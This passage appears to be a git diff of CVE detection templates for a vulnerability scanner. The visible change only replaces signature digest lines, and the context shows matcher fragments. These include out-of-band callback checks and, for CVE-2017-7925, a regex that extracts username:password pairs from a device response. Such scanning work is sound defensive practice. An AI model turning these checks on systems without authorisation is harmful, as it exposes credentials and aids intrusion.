'contains(body_3, "Social Login by")' condition: and - -# digest: 4a0a00473045022100d950f2ffe22514dcac56d98e1d2b4781abdd7124c62c6248bb4573f3dcbae43e02206466f291183b88851306bca74b296f0b9231ee3948c7425ca106f3292f1c63c1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b1c36d21dc46547f10e6f183639fca1e64104a2c021a418c26b61058129bb4040220397d0971326573bc221dad0acc90eded03ad184c4fba3173f4ff98eed05a6ccb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index a065565f14..c84eba8be7 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Subscriber by")' condition: and - -# digest: 4b0a00483046022100833420aaa259d481707412e4ffa5e01c4493a29d755cfc97a37a810a8eb045d2022100a67adf7163effea6d1d596857d2597fa619b1cdb21ddc05b31a3f148c51c75d3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cd2c203ab7a31e8b08aa725def5ee17aee3011e8dcaf7e7b1620f0183800ba8c02200999dc9092e216a5d382ed6b45223874a5fd40b2f6bf49a5efa5667b3c7978ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index 15005f49f0..7304bd0011 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Twitter Button by")' condition: and - -# digest: 4a0a00473045022100e6b1c52d7f5c150e6287fb21af9afe218e99ab2b2d151db2ea3f3c534bb00b85022010801be84c480278a05dd536d823107f7169a27d4fde87677477076f2d591874:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203a60a94e8c7d5c487860c09c4b63636cd6ec621a7dbb2e1eb07dd3e2b712d5b1022070595ef387ecea82ddeaf83e48a59d12a3bdd75a0d75c6a2214c44dec5b0f2c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index 2cf297de6b..98f1fa1675 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -53,5 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "LinkedIn by BestWebSoft")' condition: and - -# digest: 4b0a00483046022100b86ea06fbcaa289e194e02bc021b9c5d1bef723a99757c4a032a7e40181c86e70221009ae105e33a7b5273d4fa7acee73bd0fe39caaffd74b6fd7dc8d00eedd36bcec5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a6b3993c9b1db66eb59847f6872ddf7b1212e34a340a63a4f44f737c7d911fc402201f413cb1fe36d3f63d1ad50d342211ad90f93571afd855aa9927bb69a5307ab1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index 76e21d1f1e..eb0c7793b2 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -53,5 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Pinterest by BestWebSoft")' condition: and - -# digest: 4a0a004730450220077ae63f4bc53d7b4d02cfdc69803655e8d8606642f9d679617900231025cc47022100daaf66f0889e469b8e049a3146caeb58d3390921cb10043178048ac123cbad38:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a4fe39bbc3cc903e530382f3d652606857e533a3c91d069b0e3c3bece19467a902205616aa3f3fce49fec85519aac59c35f65903d3ca02382a3a27dbc5bb7ebb1be6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index 3d933059c3..6946d86463 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -53,5 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "SMTP by BestWebSoft")' condition: and - -# digest: 4a0a004730450221009300ca3dc0c62a23ec8ccb12da5850614f3c1d71dfafa3849399e65653df4954022033e71aa063972ce39c5e704e33b145833542534dc6e7b4938e15aadf4ca835a7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d3613def32eeda615bedaefb8e4a67b8b8582b33732ec81c2392f6d6c36ffb83022100aa00bc62f505768e25e58eba9fdf794bee3622d32aad9370552c9e812459ebe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index 964e568578..369097f733 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Pagination by BestWebSoft")' condition: and - -# digest: 490a0046304402200cfdecb83e98064de15735a77538f01dffbe8adc1b9c7553e6f97c597fdc3505022014b2e961116d908647b1b3d095c2b92078ef36382f8a7f2f1f1756c4992f4028:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100afe265a35fbcff7aa92c3ab9471e82be5a5006696f4bfd6bed2d79ae6ef6b6e402203fc79f2c668a3288b7b8995fd1acf55d7926b35a77acfcf0c2855e6a4e9e301b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index e853906989..156b725a9d 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "PDF & Print by BestWebSoft")' condition: and - -# digest: 4a0a0047304502201b2114b39ad36dee7d5726d72ebf4bec4b7a521b8e7269557d37c31be6204123022100d5ab65dbc867a3ea4ad131952536c179b72db3152101e5fcd4435d39a5096ec4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a8f41201a5ab2ac86ef4767995f8c9dbde1b97fcf5a337bc5341cf837208647802204ddc1910c4348c9915251524535dc3123b126ef655cf413f79055d71d08387e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index e41bc51c64..188c8cfbd6 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "PromoBar by BestWebSoft")' condition: and - -# digest: 4a0a0047304502206532fb233cf3e88edffd5b348003368db2a08db344ab806830e5232696260982022100938e206e1f6435eb29428ad6c8556e777fed156cd6d1622497058e43b3876f3b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009bbde8516553ca6845efc965962fb9e37e2017f945eb44396ab2a580e3472660022100e70ec80fef75f80890e01cad13feb4a51ec55cd0511c1b5db5c817174608f0f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index ca60da19d0..c635f9d7ed 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Rating by BestWebSoft")' condition: and - -# digest: 4b0a004830460221008930c7f84f50ac75f101440ae8b956816e627ec61986b2c5e9daa797703736af022100be6958cf6709d065797dd4f6c339815a594df9623532d0d0b3556b67d6ed96e7:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205cdc2bb729fae78d6d7fedfb8adb99f358e8ebcb0132f2917cfbf5fc661655fc022048740daaf774ffe3f5599ff24e9a73abdd9ed8fd2d1642db4fd814a3c64b90bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index 176a01a668..52eb5d93a3 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Realty by BestWebSoft")' condition: and - -# digest: 4a0a0047304502206ee6aea9219193cdbc5ae928cc827367afaacd369f48d12f1b5d2758d5551dbf0221009d88922f7db3088ca5f2cd0eef0a8734b9974ab3c4c5c7cd64f098b20bd65b89:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100dd0f200e8c64a7c032f7cb761831e6cf2d644c3d646b511b6844b4ae7521297202204d01cc15ed27194d573d04d3fc5b97a01b6a848f5a5a898b6e68641e25e84d85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 93dec9a81c..3c4b8baa24 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022001b72464748fe057e67ff42b9f0244d894c3a16d22854baa9667c54ac889bb88022100c49b811539ffedfafc0a05af63f735e66131f2692c68982db0b737f3bb0ea11e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f4ba9c8c3c040c47bf2102c0594feee22b003cec24c2c7049c35eaa0d62849b2022027df86256eb920b653109c6dc90955bf06688dc8d474d614cd51c2a3aac6664a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index 8769d49f3a..10c91c710a 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Visitors Online by")' condition: and - -# digest: 490a00463044022058bf40fe0537ce574137fad3418de8255110f8a6474bf424d52161da5b78f70902200e0a1f0fc0cb6bc408f0baa4a09ef7a4e9ca6a11c7cada9b4787d32aafcb994a:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205bf1aac72da6825cd34eb1bb5b6144c901048ab585f4ca9492938714dfb2f7f30220444fb46bf7234f6fe1482f6175c0f6ebe7004be2488cd9b89474c84d4e84f762:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index d2f24a814e..a4cec7d4a2 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Zendesk Help Center by BestWebSoft")' condition: and - -# digest: 4a0a00473045022100ebe6a293bd88eb8d93af26317ce52a6eeaaa625ad7df7e874be5d8bb2aad259d0220009af145871c1b33120276983678d8d4bddf43aab3a87f7575f8ef6e1d0f4c31:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c741964f2f1d511de5b85c573d550689810e89e2dc594583132be0ce7b19c7b7022100b29fef4e48d158cbeae3ac4fa7f39fdc26725b266d90f5a495535e42355aa3d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index 92fa36949e..9126e6f8f9 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -53,5 +53,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google Analytics by BestWebSoft")' condition: and - -# digest: 4a0a00473045022100b22d64fbe2e6c500bbaed4b4a462dd2baee9f3181eff6d15fa3406d67ce6c1c30220773027c9bd66f88c9fdb426506ab7fdc2f6d050279a268007829f3845ee400bf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a5a0eba21433d0d14642059074f4aa36bde46628aa1a5bea53b650042f193c0e022038c12e3c3e04548e5f6f0ccbc80211fb22b1085f1ceff9554ff297504a3955a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index 13ef04a96c..dcb8486a09 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Testimonials by BestWebSoft")' condition: and - -# digest: 4a0a004730450220084a00ef0d61dfcb2788fc3535e2c6d87eab2212f9edd6a153577d8ab493823d022100b26b73611f8a38b1a6094ce30e81e79ac8b0e008de2deebd6000e02fd4a0b0fd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022001e185626802919d1ecf1f3a6e6c1345f231af840fb4bcd820c72e6f335e5da4022100908dd573b19d4f6b5e908b259cf6617280fd1cb496fa3c0f56a064d2cb620f47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index f58b8217b1..64c6b02fc9 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Error Log Viewer by BestWebSoft")' condition: and - -# digest: 4a0a00473045022100c60b794b3253da9cd3b26f889c57f11379e802ab8ba8b70f744d8b0a15b1b4cb022029257edbf90887974d72eb27992c0e639b76497236574da254dddcfdb8079e07:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ada0593cf5422d8839e5e540bab0a2a45343207e34a948c8147c3168b0ba727c022100edacd10fd1294c10d7cb82947bbf368d29a9395155749aa6e9512edddb402dd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index 31d80e91a8..be5b465fa7 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Sender by BestWebSoft")' condition: and - -# digest: 4b0a00483046022100cba2d808cffd3b0aea67b19b2fc409895b624e37603f736b7db5fd736d1aefcc02210096f0fcab294f51bb6fa791ea7dd53eb857ed550a549cd38bed74a1eca6ff32ee:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204276cb0a164d27a520f9e34f1c22e81328fa9438834f6c362e934b922f1c24fb0221008f0a27a0d3a5f4233603ed9b7eab09bb1c738f1908d9e3d8361134bff606edf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index 5fd927ae85..d07dca0d5b 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Updater by BestWebSoft")' condition: and - -# digest: 4a0a0047304502200cdbd61e72973e0ed9c9763710ada7251191d116b8d637f790a04b5c3e9acb6b022100fa7f096b404bba49bcb157fffa331a28a138dcb5327f48037c6bbebb87bbbcad:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c50be1d75edc58c9a98363104c8a728e1b708995c725edc36ca4d874913a470f02210099b340e1a137df833787b80a229c9a167582a4c98de34379c1dc55b4bd03d3da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index 0d8137b266..394cbe1f02 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -52,5 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "User Role by BestWebSoft")' condition: and - -# digest: 4a0a00473045022100d64304307bb57e5f39a7042742ae7ebb740c991f9693e1cf846f4d373a40b08b02207ec0521522d28db6a427a244b2a1f1684fdabbc896fe3e165c6de19f2dc737ff:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a31e0f239ffbbb48701494666c5a01e51e9a2ecae4e695e42dd6f0c07b746915022100dd4a07fdf7150a8c7a48830e7b1654033f4aa75778a86903b6d72ec17ccfb15e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 239091fbab..c9eb9f008c 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -43,5 +43,4 @@ http: part: body words: - "console.log" - -# digest: 4a0a0047304502203f1d0dfa12bb5cbb5ef63a98ac5703f21ead55757f054c252c3a8f65c79e3f5a022100b2d43e44bbc94f8d18cd57fdda5f6aa57af77e9bc7e25d6d819c897e3c4a18c0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e1f798e2f4cabc6b46b6ad4da7ebe864a8269a0641c6c4b889c31a14f821d04f022100b307016acc0e1f009712585b009ff23b5419aee85e00550766392f17460ff50a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index c5f06e1217..b86dd9b5cc 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -38,5 +38,4 @@ http: part: interactsh_protocol words: - "http" - -# digest: 490a0046304402205de4f871a73b41a877f5e6fc42459f3243a56bebd15fd3a476697a0d5ca2d55102207481d9570b2ec6b31a062b917ec7300122915fb77cea2ee1fcda46834be4bc0b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100935414085701d884abd24835ac015c8a8b86d12f31d54785e28e1b22903b70a8022023b8604b1320d43907ebf1a6955cee6450cd91891108862e4a091ab6c0ed8a30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index b243956b1d..13b5f6e804 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -37,5 +37,4 @@ http: part: body words: - 'noresize src="/\interact.sh?configName=' - -# digest: 490a00463044022028b08411814694d1ee0598d68196504a8ac42bdfdee04aba050f4bb204c83fa802207bd6e815893549b379706a9b0a6a4963d49e60b8bd8516ca4400eda78ace6196:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b5d7deeb616a2d90f6cebfa2bc687e46fee225966d35d4fe8cbebc20ff019fc1022100f0f4ffa2c09a3345bbf3b51e185b7c611050bc6feb845f2fc881ed7ccf3a9ed8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index 6fde8c13bb..951e812573 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -45,5 +45,4 @@ http: part: header words: - "text/html" - -# digest: 490a004630440220513842a1f7ebcf19628ea30647dd5784c645598c601459f39a6bad0c91b578b8022006afe68eef8bd1c5c124472ae4e145525959513a3dbea205fde86d004e3e0542:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022006a29bb46d177091d820a5729bdd9cdca10031ed02cf574ab6640d8e2d4262a70220791c98d58a61c7be74e8dead292f4e84730988e11856ebc83f90bebb182818c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml index 256df49a3a..eb1f0171b0 100644 --- a/http/cves/2017/CVE-2017-5487.yaml +++ b/http/cves/2017/CVE-2017-5487.yaml @@ -63,5 +63,4 @@ http: - '.[] | .slug' - '.[].name' part: body - -# digest: 4b0a00483046022100b1a63d700bc6d227f78ed346d95cb85318c9583cc3b8e7c0e468b6be388e4af7022100c270616f5ec774343eaed385a32b8bf08e14f5691bc660bf384c520dbc896577:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e7ef049ad1384941459bf0ef1cc615ac4b0fe05cc5fe133bda4bcc5979245305022100e90b23ba6ba1e969b331aad05a076e74c76e5aead23d92dc81e52ca4b152b52a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 9c9b075e26..5ddcb7bf4f 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210081ebdb8965cb8aeb119418238e5149c3a21d7c9938ba5202caaac288554e588102206094c3cf4ed8b3301835d4770c041ba4f427177452642f3587973bed0398cc66:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220177aff4a7be675b0a76e35035789c6113b8f2fcdf036b863d776fb0ab3a7a79802207d128ec8972d308a990f92a076381c71c5b7bcef5ab0fd30950e6b68087ff480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index b80f05d17c..02ce355416 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220281b4078b54917916ffaf0fbbbae8961cfa693c309f05a888e0fae95985e75a502206e9a3059dd61fb76e9ea5fa747a815326052e2f81f110be26319802342824e67:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e9f7fb6e6ad9da45859ad1ee8517adc5db74cd9bf430e6a3bf3d2a2b33a2739e02201a771e6107b462cd69849240e7c46a7d0029c1d5f3d099096498e61f631ed1fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index c917c4e91f..5cd86b7ac5 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -42,5 +42,4 @@ http: part: header words: - "application/xml" - -# digest: 490a0046304402200adf6eb269de7e1da833a9cdd9415283effa00fd71864f5ad1e2be95a553d51602207bf4538c5ac0b5db84c4c5cd3fa6095d41a10135983f8cc20b8cae18b79ff269:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022060783dd942f97c7c7f33952bdd211690905780cd16e887953ee6c1fba641ceb1022029b729450abdabfdd4b479e50bba9a27101ceefc20bb3e28c6d3a24df66bcd51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index dd781049b7..e146bf98b2 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -45,5 +45,4 @@ http: group: 1 regex: - 1:(.*:.*):1:CtrPanel - -# digest: 4b0a00483046022100e49b13b4821e3f5e15efa2ddc11749609fd688782b306e9466e88f7e4c0cfa4c022100d9349c0df26bb203f1b5162d905e83595305c7d4a8cf3443ff0ea520ecfc17e2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022009752c8e430ddb662d667ac94542b835f62a3df3ccbcbb95f18c018930abbb3a022100c0842b26af1aab4c6189e1d24263b88981e56956f6db407cc2b4865ee1d74fe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml index 3e0ce98536..65e4fb5ba7 100644 --- a/http/cves/2017/CVE-2017-8229.yaml +++ b/http/cves/2017/CVE-2017-8229.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220168ec2c6cb5534941e1abf085a839637b8091c60064c4e01d4260e846b7a1c4c02205327c8348fe8d33b43eb35d7e577669dc8e8344a72223ab211f2f1e55e0a7b92:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200d12aee4c66e236d7d4305317b4257b2652bc1c92269357c11b1a46b17b2b3ea022100bc920bcccc26c73ebcdf0c7ee28234d9c0472185497566a34889e7c58e69c6f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index 24b9916c1a..3b2af265c2 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d2348f9a7e33886bf094b404612e7d4eae8923958b4a4c44209456fb483771b8022100ae7c953ed0b1b5235932c011ddfe06c68d6b3f12388109d0e67876b88b874e5a:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022023d709243116f8a4a22599f8e7ad11161036b9ad6c03a84d3475a7150e296b55022068bfcaa78cb47a1b5ed3252f43014ffeefd796e6e342a21e53d654f012dc319b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 20c732a7e7..36c9ef20bf 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205bb86c129f7e78292c194e3c3378f0e8f065702f1e5a63607f76079d1d3b3adc02205c27b567d28789bf69b246a2aa9e25fea0d363290840437eefe906fa33a5c3df:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008b14ab5ce3781bfc2b5082a3601d1679ace1c7ca00e57553075b5c19a890f0c302202283a0757f9cf94dc0931cb7dce3a217fea670f76abde02fcc7ba077fbf675c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 9e177c2ca1..c186b72161 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -49,5 +49,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and - -# digest: 4a0a00473045022100ad4360027a0a1888645167c0b75df92634dfbec3cbc00f5e3d7906fd2abbfd9002202e534275e2add4b84053da350d177f44e5ad13a5b13e98bbe80c3520c2cb7f00:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202b3bb235066f8c59e8023e9c157214b25685c8a03311a1c71c63076d4904f4e002206d8925e0b66bcd7cab313b6dd20586d367e161d6c1f16014d7cd87601b6c4ca6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index f4650a5452..9c0826785b 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -39,5 +39,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 4a0a0047304502204e980a791a5ead74e98ce37902e9818f44069d47411573d2e68d11260745cc90022100c5c152607c9ef4ed0e973ad34782d5d5456b0375840df8220b972302f748e9ec:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022055ac4f06307633c2a42471d6dde0376e64f4f3d060b83b4d60ea553c176a41a6022100aeb8d48394999676ab83923409d2c81a8fe374c83092daeef5024a646f360c10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index e328ff46f8..576afc705e 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 404 - -# digest: 4a0a004730450220163500188bead25d6973bad92af6f9cd38e4a2c5eae9c3017e0827f452855ae7022100926ba991082c503349c24178be19c60e30c752f90a4b67716b9d20e53a5765aa:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f084843747fcbfa89d1b6d0bd979ce761bfeeddc28d501eeebe14ac306c777760220062452dea7adab06f4a94d85adf93fc9440559ad101a53c79baee831eb1e06a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index 146211bde7..1b04fed38e 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210091861b198ca4d7f50d643f0b0d16bba1560a373b59d5844d9ee760ffa8eae205022100edb5e026c7f00ab9656e0d19d55aa2570eebcc812e3791bacf8c25a146b57ca0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008cbe4c00196f0859e697f0f8fc3c8408f88d7ce7a2e3a1047f050b237e5ffb54022041c03bdc8202b0c0676fd10282f9ea461de11572d61ff7c9c9c1e38b2a11ecc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index 